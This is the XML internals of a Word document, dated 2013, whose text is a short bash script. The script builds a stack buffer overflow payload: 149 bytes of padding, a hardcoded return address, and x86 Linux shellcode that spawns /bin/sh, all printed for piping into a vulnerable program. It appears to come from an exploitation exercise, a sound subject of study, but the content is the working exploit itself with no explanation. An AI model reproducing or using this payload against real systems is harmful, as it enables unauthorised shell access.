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0694C" w14:textId="77777777" w:rsidR="00842D09" w:rsidRDefault="00842D09" w:rsidP="00842D09">
      <w:r>
        <w:t>#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E24667E" w14:textId="0C3D29F4" w:rsidR="00842D09" w:rsidRDefault="000725AA" w:rsidP="00842D09">
      <w:r>
        <w:t>shellcode="</w:t>
      </w:r>
      <w:r w:rsidRPr="000725AA">
        <w:t>\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="657CE077" w14:textId="77777777" w:rsidR="00842D09" w:rsidRDefault="00842D09" w:rsidP="00842D09"/>
    <w:p w14:paraId="02BC1644" w14:textId="77777777" w:rsidR="00842D09" w:rsidRDefault="00842D09" w:rsidP="00842D09">
      <w:r>
        <w:t>s="\xff"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AEEACD" w14:textId="77777777" w:rsidR="00842D09" w:rsidRDefault="00842D09" w:rsidP="00842D09"/>
    <w:p w14:paraId="45726183" w14:textId="77777777" w:rsidR="00842D09" w:rsidRDefault="00842D09" w:rsidP="00842D09">
      <w:r>
        <w:t>for i in {1..148}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5013C169" w14:textId="77777777" w:rsidR="00842D09" w:rsidRDefault="00842D09" w:rsidP="00842D09">
      <w:r>
        <w:t>do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EFBA1B" w14:textId="77777777" w:rsidR="00842D09" w:rsidRDefault="00842D09" w:rsidP="00842D09">
      <w:r>
        <w:t xml:space="preserve">        s+="a"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C352EF" w14:textId="77777777" w:rsidR="00842D09" w:rsidRDefault="00842D09" w:rsidP="00842D09">
      <w:r>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B516C5A" w14:textId="77777777" w:rsidR="00842D09" w:rsidRDefault="00842D09" w:rsidP="00842D09"/>
    <w:p w14:paraId="4DB65DC9" w14:textId="77777777" w:rsidR="00842D09" w:rsidRDefault="00842D09" w:rsidP="00842D09"/>
    <w:p w14:paraId="6838BE7C" w14:textId="77777777" w:rsidR="00842D09" w:rsidRDefault="00AC6F24" w:rsidP="00842D09">
      <w:r>
        <w:t>#ebp_address="0xbffffb4</w:t>
      </w:r>
      <w:r w:rsidR="00842D09">
        <w:t>8"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F08C69" w14:textId="77777777" w:rsidR="00842D09" w:rsidRDefault="00842D09" w:rsidP="00842D09">
      <w:r>
        <w:t>rip="\x50\xfb\xff\xbf"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E479188" w14:textId="77777777" w:rsidR="00AD5883" w:rsidRDefault="00842D09" w:rsidP="00842D09">
      <w:r>
        <w:t>printf $s$rip$shellcode;</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00AD5883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09"/>
    <w:rsid w:val="000725AA"/>
    <w:rsid w:val="00842D09"/>
    <w:rsid w:val="00AC6F24"/>
    <w:rsid w:val="00A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43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</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-03-17T21:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-03-18T01:46:00Z</dcterms:modified>
</cp:coreProperties>
</file>